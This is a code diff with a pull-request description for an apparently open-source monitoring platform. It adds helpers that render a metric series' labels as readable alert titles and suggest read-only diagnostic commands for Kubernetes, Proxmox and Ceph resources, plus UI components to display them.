+    const rawId: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "id",
+    ]);
+
+    if (!rawId.includes("/")) {
+      return { type: declaredType, id: declaredId };
+    }
+
+    const segments: Array<string> = rawId.split("/");
+
+    return {
+      type: declaredType || segments[0] || "",
+      id: declaredId || segments[segments.length - 1] || "",
+    };
+  }
+
+  private static proxmoxCommands(
+    seriesLabels: JSONObject,
+  ): Array<SeriesDebugCommand> {
+    const commands: Array<SeriesDebugCommand> = [];
+
+    const parsed: { type: string; id: string } =
+      SeriesDebugHints.parseProxmoxId(seriesLabels);
+
+    const vmid: string =
+      SeriesLabelDisplay.findLabelValue(seriesLabels, ["vmid"]) ||
+      (parsed.type === "qemu" || parsed.type === "lxc" ? parsed.id : "");
+
+    if (vmid) {
+      const quoted: string = SeriesDebugHints.quoteForShell(vmid);
+
+      /*
+       * `qm` addresses VMs and `pct` addresses LXC containers. When the
+       * series says which, only the right one is offered; when it does
+       * not (a bare `vmid` label on a hand-built monitor), both are, and
+       * the wrong one simply reports that no such guest exists.
+       */
+      if (parsed.type !== "lxc") {
+        commands.push({
+          purpose: "Current VM status and resource use",
+          command: `qm status ${quoted} --verbose`,
+        });
+        commands.push({
+          purpose: "The VM's configured limits",
+          command: `qm config ${quoted}`,
+        });
+      }
+
+      if (parsed.type !== "qemu") {
+        commands.push({
+          purpose: "Current LXC container status",
+          command: `pct status ${quoted}`,
+        });
+        commands.push({
+          purpose: "The container's configured limits",
+          command: `pct config ${quoted}`,
+        });
+      }
+    }
+
+    const node: string =
+      SeriesLabelDisplay.findLabelValue(seriesLabels, [
+        "proxmox.node.name",
+        "node",
+      ]) || (parsed.type === "node" ? parsed.id : "");
+
+    if (node) {
+      commands.push({
+        purpose: "Cluster membership and quorum",
+        command: `pvecm status`,
+      });
+      commands.push({
+        purpose: "Load, memory and uptime on the affected node",
+        command: `pvesh get /nodes/${SeriesDebugHints.quoteForShell(
+          node,
+        )}/status`,
+      });
+    }
+
+    const storage: string =
+      SeriesLabelDisplay.findLabelValue(seriesLabels, ["storage"]) ||
+      (parsed.type === "storage" ? parsed.id : "");
+
+    if (storage) {
+      commands.push({
+        purpose: "Capacity and health of the affected storage",
+        command: `pvesm status --storage ${SeriesDebugHints.quoteForShell(
+          storage,
+        )}`,
+      });
+    }
+
+    /*
+     * A cluster-scoped id ("cluster/production") and any id shape this
+     * parse does not recognise still deserve a first command, and
+     * cluster resource status is the one that is always correct.
+     */
+    if (commands.length === 0) {
+      commands.push({
+        purpose: "Status of every node, guest and storage in the cluster",
+        command: `pvesh get /cluster/resources`,
+      });
+    }
+
+    return commands;
+  }
+
+  private static cephCommands(
+    seriesLabels: JSONObject,
+  ): Array<SeriesDebugCommand> {
+    const commands: Array<SeriesDebugCommand> = [
+      {
+        purpose: "Cluster health detail, including the reason for any warning",
+        command: `ceph health detail`,
+      },
+    ];
+
+    const daemon: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "ceph_daemon",
+    ]);
+
+    if (daemon) {
+      const quoted: string = SeriesDebugHints.quoteForShell(daemon);
+
+      commands.push({
+        purpose: "State and recent history of the affected daemon",
+        command: `ceph daemon ${quoted} status`,
+      });
+      commands.push({
+        purpose: "Where the daemon sits in the CRUSH tree",
+        command: `ceph osd tree`,
+      });
+    }
+
+    const pool: string = SeriesLabelDisplay.findLabelValue(seriesLabels, [
+      "pool_id",
+      "pool",
+    ]);
+
+    if (pool) {
+      commands.push({
+        purpose: "Per-pool capacity and object counts",
+        command: `ceph df detail`,
+      });
+    }
+
+    return commands;
+  }
+
+  /*
+   * The read-only commands worth running first for this monitor type
+   * and this series, or [] when the series carries nothing to address.
+   */
+  public static getDebugCommands(input: {
+    monitorType: MonitorType | undefined;
+    seriesLabels: JSONObject | undefined;
+  }): Array<SeriesDebugCommand> {
+    const seriesLabels: JSONObject | undefined = input.seriesLabels;
+
+    if (!seriesLabels || Object.keys(seriesLabels).length === 0) {
+      return [];
+    }
+
+    switch (input.monitorType) {
+      case MonitorType.Kubernetes:
+        return SeriesDebugHints.kubernetesCommands(seriesLabels);
+
+      case MonitorType.Docker:
+        return SeriesDebugHints.containerCommands({
+          seriesLabels,
+          cli: "docker",
+        });
+
+      case MonitorType.Podman:
+        return SeriesDebugHints.containerCommands({
+          seriesLabels,
+          cli: "podman",
+        });
+
+      case MonitorType.DockerSwarm:
+        return SeriesDebugHints.dockerSwarmCommands(seriesLabels);
+
+      case MonitorType.Host:
+      case MonitorType.Server:
+        return SeriesDebugHints.hostCommands(seriesLabels);
+
+      case MonitorType.Proxmox:
+        return SeriesDebugHints.proxmoxCommands(seriesLabels);
+
+      case MonitorType.Ceph:
+        return SeriesDebugHints.cephCommands(seriesLabels);
+
+      /*
+       * Metrics / IoT / RUM / Traces and friends deliberately return
+       * nothing: their series identify an application-level entity
+       * (a service, a device, a route), and there is no command that is
+       * both universally correct and read-only for those. The resource
+       * block still names the entity.
+       */
+      default:
+        return [];
+    }
+  }
+
+  /*
+   * The commands rendered as a markdown block for an alert/incident
+   * description, or "" when there is nothing to suggest - so callers
+   * can concatenate unconditionally.
+   */
+  public static buildMarkdownBlock(input: {
+    monitorType: MonitorType | undefined;
+    seriesLabels: JSONObject | undefined;
+    maxCommands?: number | undefined;
+  }): string {
+    const commands: Array<SeriesDebugCommand> =
+      SeriesDebugHints.getDebugCommands({
+        monitorType: input.monitorType,
+        seriesLabels: input.seriesLabels,
+      });
+
+    if (commands.length === 0) {
+      return "";
+    }
+
+    const maxCommands: number = input.maxCommands ?? 6;
+
+    const lines: Array<string> = commands
+      .slice(0, Math.max(maxCommands, 1))
+      .map((command: SeriesDebugCommand) => {
+        return `- ${command.purpose}:\n  \`\`\`\n  ${command.command}\n  \`\`\``;
+      });
+
+    return `**Start here**\n${lines.join("\n")}`;
+  }
+}

--- a/Common/Types/Monitor/SeriesContext/SeriesLabelDisplay.ts
+++ b/Common/Types/Monitor/SeriesContext/SeriesLabelDisplay.ts
@@ -1,0 +1,542 @@
+import { JSONObject, JSONValue } from "../../JSON";
+
+/*
+ * Turning a metric series' raw label map into something an on-call
+ * engineer can read at 3am.
+ *
+ * A grouped metric monitor stores the breaching series' identity on the
+ * alert/incident as `seriesLabels` - a map of ClickHouse attribute key
+ * to value, e.g.
+ *
+ *   { "resource.k8s.namespace.name": "prod",
+ *     "resource.k8s.pod.name": "checkout-7d9f-2xk",
+ *     "resource.k8s.container.name": "app",
+ *     "resource.k8s.node.name": "ip-10-0-3-14" }
+ *
+ * Those keys are correct but unreadable, and - more importantly - they
+ * used to live ONLY in a table on the alert detail page. The alert
+ * title, which is what shows up in the alert list, in Slack, in email
+ * and on a phone at 3am, carried none of it, so fifty alerts from one
+ * monitor rendered as fifty identical lines of text.
+ *
+ * This module is the shared, presentation-layer answer to that: given a
+ * label map it produces a stable, deduplicated, human-ordered rendering
+ * of the resource identity, in three shapes (inline summary, title
+ * suffix, markdown block). It lives in Types (not Server) because the
+ * dashboard renders the same identity next to alerts and must not
+ * reimplement the naming.
+ */
+
+/*
+ * Friendly names for the label keys OneUptime's own agents and the
+ * shipped recommendation templates actually group by.
+ *
+ * Keys are matched twice: once verbatim, and once with the ClickHouse
+ * `resource.` prefix stripped - OtelMetricsIngestService stamps that
+ * prefix onto OTel *resource* attributes, so the very same concept
+ * arrives as `resource.k8s.pod.name` from a resource attribute and as
+ * `k8s.pod.name` from a datapoint label. Registering the unprefixed
+ * spelling once covers both.
+ */
+const FriendlyLabelNames: Record<string, string> = {
+  // --- Kubernetes ---
+  "k8s.cluster.name": "Cluster",
+  "k8s.namespace.name": "Namespace",
+  "k8s.pod.name": "Pod",
+  "k8s.pod.uid": "Pod UID",
+  "k8s.container.name": "Container",
+  "k8s.node.name": "Node",
+  "k8s.deployment.name": "Deployment",
+  "k8s.replicaset.name": "ReplicaSet",
+  "k8s.statefulset.name": "StatefulSet",
+  "k8s.daemonset.name": "DaemonSet",
+  "k8s.job.name": "Job",
+  "k8s.cronjob.name": "CronJob",
+  "k8s.hpa.name": "HPA",
+  "k8s.persistentvolumeclaim.name": "PVC",
+  "k8s.volume.name": "Volume",
+
+  // --- Containers (Docker / Podman / Swarm) ---
+  "container.name": "Container",
+  "container.id": "Container ID",
+  "container.image.name": "Image",
+  "container.runtime": "Runtime",
+  "docker.swarm.service.name": "Swarm Service",
+  "docker.swarm.node.name": "Swarm Node",
+  "docker.swarm.cluster.name": "Swarm Cluster",
+  "oneuptime.docker.host.name": "Docker Host",
+  "oneuptime.podman.host.name": "Podman Host",
+
+  // --- Hosts / OS ---
+  "host.name": "Host",
+  "oneuptime.host.name": "Host",
+  "host.id": "Host ID",
+  mountpoint: "Mount",
+  device: "Device",
+  "system.device": "Device",
+  "disk.path": "Disk",
+  "network.interface": "Interface",
+  interfaceName: "Interface",
+  interfaceAlias: "Interface Alias",
+  diskPath: "Disk",
+  cpu: "CPU",
+  direction: "Direction",
+  state: "State",
+  process: "Process",
+
+  /*
+   * --- Proxmox ---
+   *
+   * pve-exporter encodes identity in a single `id` datapoint label
+   * ("qemu/100", "node/pve1", "storage/local"), and the agent's transform
+   * splits it into `pve.scope` / `pve.type` / `pve.id` (see
+   * ProxmoxAgent/otel-collector-config.yaml). Both spellings are named
+   * here because templates group by the raw `id` while a user's own
+   * monitor may group by the derived parts.
+   */
+  "proxmox.cluster.name": "Proxmox Cluster",
+  "proxmox.node.name": "Proxmox Node",
+  "proxmox.vm.name": "VM",
+  id: "Object",
+  "pve.id": "Object ID",
+  "pve.type": "Object Type",
+  "pve.scope": "Scope",
+  vmid: "VM ID",
+  node: "Node",
+  storage: "Storage",
+
+  // --- Ceph ---
+  "ceph.cluster.name": "Ceph Cluster",
+  ceph_daemon: "Ceph Daemon",
+  pool_id: "Pool",
+  pool: "Pool",
+  osd: "OSD",
+
+  // --- IoT ---
+  "iot.fleet.name": "Fleet",
+  "device.id": "Device",
+  "device.name": "Device",
+
+  // --- Services / RUM / telemetry ---
+  "service.name": "Service",
+  "oneuptime.service.name": "Service",
+  "service.namespace": "Service Namespace",
+  "service.version": "Version",
+  "deployment.environment": "Environment",
+  "telemetry.sdk.language": "Language",
+  "url.path": "Path",
+  "http.route": "Route",
+  "browser.name": "Browser",
+  "os.name": "OS",
+  region: "Region",
+  "cloud.region": "Region",
+  "cloud.availability_zone": "Zone",
+};
+
+/*
+ * Ordering. An alert title has room for a couple of identifiers, and
+ * which couple it gets decides whether the title is useful: "Pod:
+ * checkout-7d9f-2xk" answers "what broke", "Namespace: prod" on its own
+ * does not. Lower number = more identifying = shown first and kept when
+ * the title is truncated.
+ *
+ * Container beats Pod deliberately for container-scoped metrics: a CPU
+ * *limit* is a property of one container, so when both labels are
+ * present the container is the thing that breached. Scope-setting
+ * labels (namespace, cluster, node) rank after the object itself - they
+ * qualify the answer rather than being it.
+ */
+const LabelPriority: Record<string, number> = {
+  "k8s.container.name": 10,
+  "container.name": 10,
+  "k8s.pod.name": 20,
+  "k8s.deployment.name": 25,
+  "k8s.statefulset.name": 25,
+  "k8s.daemonset.name": 25,
+  "k8s.job.name": 25,
+  "k8s.cronjob.name": 25,
+  "k8s.hpa.name": 25,
+  "k8s.persistentvolumeclaim.name": 25,
+  "k8s.volume.name": 25,
+  "docker.swarm.service.name": 25,
+  ceph_daemon: 25,
+  pool_id: 25,
+  "device.id": 25,
+  "device.name": 25,
+  "proxmox.vm.name": 25,
+  vmid: 25,
+  id: 30,
+  "pve.id": 32,
+  "pve.type": 55,
+  "pve.scope": 90,
+  mountpoint: 30,
+  diskPath: 30,
+  "disk.path": 30,
+  interfaceName: 30,
+  device: 35,
+  "system.device": 35,
+  storage: 35,
+  "service.name": 40,
+  "oneuptime.service.name": 40,
+  "k8s.namespace.name": 50,
+  "service.namespace": 50,
+  "k8s.node.name": 60,
+  "proxmox.node.name": 60,
+  "docker.swarm.node.name": 60,
+  node: 60,
+  "host.name": 65,
+  "oneuptime.host.name": 65,
+  "oneuptime.docker.host.name": 65,
+  "oneuptime.podman.host.name": 65,
+  "k8s.cluster.name": 80,
+  "docker.swarm.cluster.name": 80,
+  "proxmox.cluster.name": 80,
+  "ceph.cluster.name": 80,
+  "iot.fleet.name": 80,
+  "k8s.pod.uid": 95,
+  "container.id": 95,
+};
+
+const DefaultLabelPriority: number = 70;
+
+/*
+ * How many identifiers a title carries before it stops being scannable.
+ * Three is enough for the two shapes that matter in practice -
+ * container/pod/namespace and pod/namespace/node - and the full set is
+ * always one click away in the description block and the alert's
+ * Affected Resource table.
+ */
+export const MaxLabelsInTitle: number = 3;
+
+/*
+ * Longest label value the inline (title) rendering will print in full.
+ *
+ * Kubernetes object names go up to 253 characters, and a generated pod
+ * name in a deeply-nested naming scheme really can get long. Three of
+ * those would overflow the 500-character `title` column and fail the
+ * alert INSERT outright - the alert would not exist at all, which is a
+ * far worse outcome than a shortened name. The full value is always
+ * present untruncated in the markdown block and in the alert's
+ * seriesLabels.
+ */
+export const MaxLabelValueLengthInTitle: number = 64;
+
+const Ellipsis: string = "...";
+
+export interface DisplaySeriesLabel {
+  // The raw ClickHouse attribute key, e.g. "resource.k8s.pod.name".
+  key: string;
+  // Human name, e.g. "Pod".
+  name: string;
+  // The label's value, already coerced to a display string.
+  value: string;
+}
+
+export default class SeriesLabelDisplay {
+  /*
+   * Strip the ClickHouse `resource.` prefix so a resource attribute and
+   * the same attribute arriving as a datapoint label resolve to one
+   * entry in the tables above.
+   */
+  public static normalizeKey(key: string): string {
+    if (key.startsWith("resource.")) {
+      return key.slice("resource.".length);
+    }
+
+    return key;
+  }
+
+  /*
+   * "Pod", "Container", "Node" - or, for a key nobody registered, a
+   * best-effort prettified form of the key itself. An unknown key is
+   * still far more useful spelled out than dropped: a user who groups
+   * by `tenant_id` should see "Tenant Id: acme", not silence.
+   */
+  public static getFriendlyLabelName(key: string): string {
+    const normalized: string = SeriesLabelDisplay.normalizeKey(key);
+
+    const known: string | undefined =
+      FriendlyLabelNames[normalized] || FriendlyLabelNames[key];
+
+    if (known) {
+      return known;
+    }
+
+    return SeriesLabelDisplay.prettifyKey(normalized);
+  }
+
+  private static prettifyKey(key: string): string {
+    const words: Array<string> = key
+      .split(/[._\-/]+/)
+      .filter((part: string) => {
+        return part.length > 0;
+      })
+      .map((part: string) => {
+        return part.charAt(0).toUpperCase() + part.slice(1);
+      });
+
+    if (words.length === 0) {
+      return key;
+    }
+
+    return words.join(" ");
+  }
+
+  /*
+   * Whether this key has a deliberately-registered name, as opposed to
+   * falling through to the prettified-key fallback.
+   *
+   * The fallback is right for a user's own attribute - nobody can
+   * enumerate what `oneuptime.captureMetric()` might emit - but a key a
+   * SHIPPED template groups by should always be registered, and there
+   * is no way to tell the two apart from the returned string alone
+   * (`device` prettifies to "Device", which is also its registered
+   * name). The recommendation-catalog tests use this to hold that line.
+   */
+  public static isKnownLabelKey(key: string): boolean {
+    const normalized: string = SeriesLabelDisplay.normalizeKey(key);
+
+    return (
+      FriendlyLabelNames[normalized] !== undefined ||
+      FriendlyLabelNames[key] !== undefined
+    );
+  }
+
+  public static getLabelPriority(key: string): number {
+    const normalized: string = SeriesLabelDisplay.normalizeKey(key);
+
+    const priority: number | undefined =
+      LabelPriority[normalized] ?? LabelPriority[key];
+
+    return priority === undefined ? DefaultLabelPriority : priority;
+  }
+
+  /*
+   * Coerce one label value to the string a human should read.
+   *
+   * Multi-valued labels (a series grouped on an attribute that carries
+   * an array) join with ", ". Objects are refused rather than
+   * JSON-dumped into an alert title.
+   */
+  private static toDisplayValue(value: JSONValue | undefined): string {
+    if (value === undefined || value === null) {
+      return "";
+    }
+
+    if (Array.isArray(value)) {
+      return value
+        .map((entry: JSONValue) => {
+          return SeriesLabelDisplay.toDisplayValue(entry);
+        })
+        .filter((entry: string) => {
+          return entry.length > 0;
+        })
+        .join(", ");
+    }
+
+    if (typeof value === "object") {
+      return "";
+    }
+
+    return `${value}`.trim();
+  }
+
+  /*
+   * The display-ready labels for one series, most identifying first.
+   *
+   * Empty values are dropped, not rendered blank. A grouped series
+   * always carries every group-by key - `MetricSeriesFingerprint`
+   * deliberately preserves a key whose attribute was missing as `""` so
+   * the fingerprint stays stable across evaluations - so without this
+   * filter a pod whose node attribute happened to be absent would title
+   * itself "Pod: web-1 - Node: ".
+   *
+   * Values that are duplicates of an already-included value are dropped
+   * too: several spellings of the same identity routinely ride along
+   * (`k8s.pod.name` and `resource.k8s.pod.name`, `host.name` and
+   * `oneuptime.host.name`), and repeating them buys nothing.
+   */
+  public static getDisplayLabels(
+    seriesLabels: JSONObject | undefined,
+  ): Array<DisplaySeriesLabel> {
+    if (!seriesLabels) {
+      return [];
+    }
+
+    const labels: Array<DisplaySeriesLabel> = [];
+    const seenNameValuePairs: Set<string> = new Set<string>();
+
+    const keys: Array<string> = Object.keys(seriesLabels);
+
+    // Stable order: priority first, then key, so equal-priority keys never flip.
+    keys.sort((a: string, b: string) => {
+      const priorityDifference: number =
+        SeriesLabelDisplay.getLabelPriority(a) -
+        SeriesLabelDisplay.getLabelPriority(b);
+
+      if (priorityDifference !== 0) {
+        return priorityDifference;
+      }
+
+      return a.localeCompare(b);
+    });
+
+    for (const key of keys) {
+      const value: string = SeriesLabelDisplay.toDisplayValue(
+        seriesLabels[key],
+      );
+
+      if (!value) {
+        continue;
+      }
+
+      const name: string = SeriesLabelDisplay.getFriendlyLabelName(key);
+
+      const dedupeKey: string = `${name} ${value}`;
+
+      if (seenNameValuePairs.has(dedupeKey)) {
+        continue;
+      }
+
+      seenNameValuePairs.add(dedupeKey);
+
+      labels.push({ key, name, value });
+    }
+
+    return labels;
+  }
+
+  /*
+   * "Pod: checkout-7d9f-2xk / Namespace: prod / Node: ip-10-0-3-14".
+   *
+   * Returns "" when the series carries no usable identity, so callers
+   * can concatenate unconditionally.
+   */
+  public static buildInlineSummary(
+    seriesLabels: JSONObject | undefined,
+    options?:
+      | {
+          maxLabels?: number | undefined;
+          maxValueLength?: number | undefined;
+        }
+      | undefined,
+  ): string {
+    const maxLabels: number = options?.maxLabels ?? MaxLabelsInTitle;
+    const maxValueLength: number =
+      options?.maxValueLength ?? MaxLabelValueLengthInTitle;
+
+    const labels: Array<DisplaySeriesLabel> =
+      SeriesLabelDisplay.getDisplayLabels(seriesLabels);
+
+    if (labels.length === 0) {
+      return "";
+    }
+
+    return labels
+      .slice(0, Math.max(maxLabels, 1))
+      .map((label: DisplaySeriesLabel) => {
+        return `${label.name}: ${SeriesLabelDisplay.truncateValue(
+          label.value,
+          maxValueLength,
+        )}`;
+      })
+      .join(" | ");
+  }
+
+  private static truncateValue(value: string, maxLength: number): string {
+    if (maxLength <= 0 || value.length <= maxLength) {
+      return value;
+    }
+
+    /*
+     * Keep the END of the value, not the start. Generated names put the
+     * distinguishing part last (`checkout-7d9f-2xk`), so a head-truncated
+     * `checkout-checkout-web-fro...` tells the reader nothing that the
+     * rest of the alert did not already.
+     */
+    if (maxLength <= Ellipsis.length) {
+      return value.slice(value.length - maxLength);
+    }
+
+    return `${Ellipsis}${value.slice(value.length - (maxLength - Ellipsis.length))}`;
+  }
+
+  /*
+   * The same summary, prefixed with the separator used in titles, or ""
+   * when there is nothing to say. Templates append this unconditionally:
+   * `"[K8s] Pod CPU Saturating Container Limit{{seriesResourceSuffix}}"`.
+   */
+  public static buildTitleSuffix(
+    seriesLabels: JSONObject | undefined,
+    options?:
+      | {
+          maxLabels?: number | undefined;
+          maxValueLength?: number | undefined;
+        }
+      | undefined,
+  ): string {
+    const summary: string = SeriesLabelDisplay.buildInlineSummary(
+      seriesLabels,
+      options,
+    );
+
+    if (!summary) {
+      return "";
+    }
+
+    return ` - ${summary}`;
+  }
+
+  /*
+   * A markdown block naming every identifier the series carries, for
+   * alert/incident descriptions (which is what Slack, email and the
+   * mobile push actually show).
+   */
+  public static buildMarkdownBlock(
+    seriesLabels: JSONObject | undefined,
+    options?: { heading?: string | undefined } | undefined,
+  ): string {
+    const labels: Array<DisplaySeriesLabel> =
+      SeriesLabelDisplay.getDisplayLabels(seriesLabels);
+
+    if (labels.length === 0) {
+      return "";
+    }
+
+    const heading: string = options?.heading || "Affected resource";
+
+    const lines: Array<string> = labels.map((label: DisplaySeriesLabel) => {
+      return `- **${label.name}:** \`${label.value}\``;
+    });
+
+    return `**${heading}**\n${lines.join("\n")}`;
+  }
+
+  /*
+   * Look up one logical identity across every spelling it can arrive
+   * under. Callers pass unprefixed keys ("k8s.pod.name"); both the bare
+   * and the `resource.`-prefixed spelling are checked.
+   */
+  public static findLabelValue(
+    seriesLabels: JSONObject | undefined,
+    keys: ReadonlyArray<string>,
+  ): string {
+    if (!seriesLabels) {
+      return "";
+    }
+
+    for (const key of keys) {
+      for (const candidate of [key, `resource.${key}`]) {
+        const value: string = SeriesLabelDisplay.toDisplayValue(
+          seriesLabels[candidate],
+        );
+
+        if (value) {
+          return value;
+        }
+      }
+    }
+
+    return "";
+  }
+}

--- a/Common/UI/Components/Monitor/SeriesDebugCommandsViewer.tsx
+++ b/Common/UI/Components/Monitor/SeriesDebugCommandsViewer.tsx
@@ -1,0 +1,64 @@
+import { JSONObject } from "../../../Types/JSON";
+import MonitorType from "../../../Types/Monitor/MonitorType";
+import SeriesDebugHints, {
+  SeriesDebugCommand,
+} from "../../../Types/Monitor/SeriesContext/SeriesDebugHints";
+import CopyTextButton from "../CopyTextButton/CopyTextButton";
+import React, { Fragment, FunctionComponent, ReactElement } from "react";
+
+export interface ComponentProps {
+  monitorType?: MonitorType | undefined;
+  seriesLabels?: JSONObject | undefined;
+}
+
+/**
+ * The read-only commands worth running first, already filled in with the
+ * pod / container / node / mount this alert is actually about.
+ *
+ * The commands come from `SeriesDebugHints`, which is the same source the
+ * alert DESCRIPTION uses - so what the engineer reads in Slack and what
+ * they see on this page are the same commands, and only one of them has
+ * to be kept correct.
+ *
+ * Renders nothing when the series carries nothing addressable (an
+ * ungrouped monitor, or a monitor type with no universally-safe
+ * inspection command), rather than showing an empty card.
+ */
+const SeriesDebugCommandsViewer: FunctionComponent<ComponentProps> = (
+  props: ComponentProps,
+): ReactElement => {
+  const commands: Array<SeriesDebugCommand> = SeriesDebugHints.getDebugCommands(
+    {
+      monitorType: props.monitorType,
+      seriesLabels: props.seriesLabels,
+    },
+  );
+
+  if (commands.length === 0) {
+    return <Fragment />;
+  }
+
+  return (
+    <div className="space-y-3">
+      {commands.map((command: SeriesDebugCommand, index: number) => {
+        return (
+          <div key={index}>
+            <div className="text-sm text-gray-500 mb-1">{command.purpose}</div>
+            <div className="flex items-center justify-between gap-2 rounded-md bg-gray-900 px-3 py-2">
+              <code className="font-mono text-xs text-gray-100 overflow-x-auto whitespace-pre">
+                {command.command}
+              </code>
+              <CopyTextButton
+                textToBeCopied={command.command}
+                iconOnly={true}
+                title="Copy command"
+              />
+            </div>
+          </div>
+        );
+      })}
+    </div>
+  );
+};
+
+export default SeriesDebugCommandsViewer;

--- a/Common/UI/Components/Monitor/SeriesLabelsViewer.tsx
+++ b/Common/UI/Components/Monitor/SeriesLabelsViewer.tsx
@@ -1,0 +1,93 @@
+import { JSONObject } from "../../../Types/JSON";
+import SeriesLabelDisplay, {
+  DisplaySeriesLabel,
+} from "../../../Types/Monitor/SeriesContext/SeriesLabelDisplay";
+import SortOrder from "../../../Types/BaseDatabase/SortOrder";
+import Table from "../Table/Table";
+import FieldType from "../Types/FieldType";
+import React, { FunctionComponent, ReactElement } from "react";
+
+export interface ComponentProps {
+  seriesLabels?: JSONObject | undefined;
+}
+
+/**
+ * The identity of the metric series an alert or incident was raised for.
+ *
+ * Rendered from the same `SeriesLabelDisplay` the alert TITLE is built
+ * from, so the page and the notification agree on both the naming
+ * ("Pod", not `resource.k8s.pod.name`) and the ordering (the object that
+ * breached first, the scope that qualifies it after). A generic
+ * key/value viewer here would drift from the title the moment either
+ * side changed.
+ *
+ * The raw attribute key is kept underneath the friendly name rather than
+ * dropped: it is what the user types into a Group By field or a metric
+ * filter to go and look at the same series themselves.
+ */
+const SeriesLabelsViewer: FunctionComponent<ComponentProps> = (
+  props: ComponentProps,
+): ReactElement => {
+  const labels: Array<DisplaySeriesLabel> = SeriesLabelDisplay.getDisplayLabels(
+    props.seriesLabels,
+  );
+
+  if (labels.length === 0) {
+    return (
+      <div className="text-gray-400 text-sm py-2">
+        No resource labels on this alert.
+      </div>
+    );
+  }
+
+  return (
+    <Table<DisplaySeriesLabel>
+      id="series-labels-viewer-table"
+      data={labels}
+      singularLabel="Label"
+      pluralLabel="Labels"
+      isLoading={false}
+      error=""
+      currentPageNumber={1}
+      totalItemsCount={labels.length}
+      itemsOnPage={labels.length}
+      disablePagination={true}
+      noItemsMessage="No resource labels on this alert."
+      onNavigateToPage={() => {}}
+      sortBy={null}
+      sortOrder={SortOrder.Ascending}
+      onSortChanged={() => {}}
+      columns={[
+        {
+          title: "Resource",
+          type: FieldType.Element,
+          key: "name",
+          disableSort: true,
+          getElement: (item: DisplaySeriesLabel): ReactElement => {
+            return (
+              <div>
+                <div className="font-medium text-gray-900">{item.name}</div>
+                <div className="font-mono text-xs text-gray-400">
+                  {item.key}
+                </div>
+              </div>
+            );
+          },
+        },
+        {
+          title: "Value",
+          type: FieldType.Element,
+          key: "value",
+          disableSort: true,
+          getElement: (item: DisplaySeriesLabel): ReactElement => {
+            return (
+              <span className="font-mono text-gray-700">{item.value}</span>
+            );
+          },
+        },
+      ]}
+    />
+  );
+};
+
+export default SeriesLabelsViewer;

--- a/Common/UI/Components/MonitorTemplateVariables/TemplateVariablesCatalog.ts
+++ b/Common/UI/Components/MonitorTemplateVariables/TemplateVariablesCatalog.ts
@@ -42,6 +42,7 @@ export default class TemplateVariablesCatalog {
     const groups: Array<TemplateVariableGroup> = [];
 
     groups.push(TemplateVariablesCatalog.monitorIdentityGroup());
+    groups.push(TemplateVariablesCatalog.seriesContextGroup());
 
     const perTypeGroup: TemplateVariableGroup | null =
       TemplateVariablesCatalog.perTypeGroup(input.monitorType);
@@ -82,6 +83,49 @@ export default class TemplateVariablesCatalog {
           key: "monitorId",
           description: "UUID of the monitor.",
           example: "a0f78958-da0a-4775-9fd9-c9fc63d3456f",
+        },
+      ],
+    };
+  }
+
+  /**
+   * Ready-made renderings of the breaching series' identity.
+   *
+   * Listed for EVERY monitor type, not just the grouped ones, because
+   * `MonitorTemplateUtil` defines them unconditionally - they resolve to
+   * an empty string on a monitor with no group-by rather than leaving a
+   * `{{...}}` placeholder in the rendered title. That is the whole reason
+   * they exist: `{{resource.k8s.pod.name}}` is only safe in a template
+   * that is certain to be grouped by that attribute, whereas
+   * `{{seriesResourceSuffix}}` is safe anywhere.
+   */
+  private static seriesContextGroup(): TemplateVariableGroup {
+    return {
+      title: "Affected Resource",
+      description:
+        "The specific pod / container / host / mount that breached. Resolves to an empty string on a monitor with no Group By, so these are safe to use in any title or description.",
+      variables: [
+        {
+          key: "seriesResourceSuffix",
+          description:
+            "The identity, prefixed with a separator, for appending to a title. Empty when the monitor is not grouped.",
+          example: " - Pod: checkout-7d9f-2xk | Namespace: prod",
+        },
+        {
+          key: "seriesResourceSummary",
+          description:
+            "The same identity with no leading separator, for use mid-sentence.",
+          example: "Pod: checkout-7d9f-2xk | Namespace: prod",
+        },
+        {
+          key: "seriesResourceBlock",
+          description:
+            "Every label the series carries, as a markdown list. Best in a description rather than a title.",
+        },
+        {
+          key: "seriesDebugCommands",
+          description:
+            "Read-only commands for this exact resource (kubectl / docker / df ...), already filled in, as a markdown list.",
         },
       ],
     };


### PR DESCRIPTION
## The problem

Every alert on a grouped infrastructure monitor rendered the same line. On one test project, 49 alerts read, character for character:

```
[K8s] Pod CPU Saturating Container Limit (>90%) - oneuptime-test - Pod CPU Saturating Container Limit
```

The pod that was actually being throttled *was* known — the evaluator stores the breaching series' labels on the alert, and the detail page shows them in an "Affected Resource" table at the bottom. But the title comes from the criteria template, which is one fixed string shared by every series on the monitor, so the alert list, the Slack message, the email and the phone notification all carried none of it. On call, you could not tell which pod, container or node without opening each alert.

Two things caused it:

1. **The identity never reached the title or the description.** It stopped at a table on the detail page.
2. **The recommendation templates did not group by enough to *have* an identity.** Pod-scoped templates grouped by `resource.k8s.pod.name` alone — and a bare pod name is not a Kubernetes identity, since pod names are only unique within a namespace. Container-scoped templates (CrashLoopBackOff) did not group by container at all, so the alert could not name which container of the pod was crashing.

## What this changes

### 1. Alerts and incidents name the resource that broke

New `SeriesContextEnricher` runs at creation time, after the criteria template has been rendered:

**Before**
```
[K8s] Pod CPU Saturating Container Limit (>90%) - oneuptime-test - Pod CPU Saturating Container Limit
```

**After**
```
[K8s] Pod CPU Saturating Container Limit (>90%) - oneuptime-test - Pod CPU Saturating Container Limit - Pod: kubernetes-agent-logs-7t88f | Namespace: oneuptime
```

The description gets the full label set plus the read-only commands to run first:

````markdown
A pod's CPU usage has exceeded 90% of its configured container CPU limit ...

**Affected resource**
- **Pod:** `kubernetes-agent-logs-7t88f`
- **Namespace:** `oneuptime`

**Start here**
- Pod status, events, restart reasons and resource limits:
  ```
  kubectl describe pod kubernetes-agent-logs-7t88f -n oneuptime
  ```
- Recent logs from the container:
  ```
  kubectl logs kubernetes-agent-logs-7t88f -n oneuptime --tail=200
  ```
  ...
````

This applies to **every** per-series monitor — Kubernetes, Docker, Podman, Docker Swarm, Host, Proxmox, Ceph, IoT, Metrics — including monitors that already exist. No migration needed, and it is a no-op for monitors with no Group By.

It never fights a template the user wrote themselves: a title that already names the series (because they used `{{resource.k8s.pod.name}}`, or the new `{{seriesResourceSuffix}}`) is left exactly as written, and only the labels it is missing are appended.

### 2. "Start Here" commands on the alert / incident page

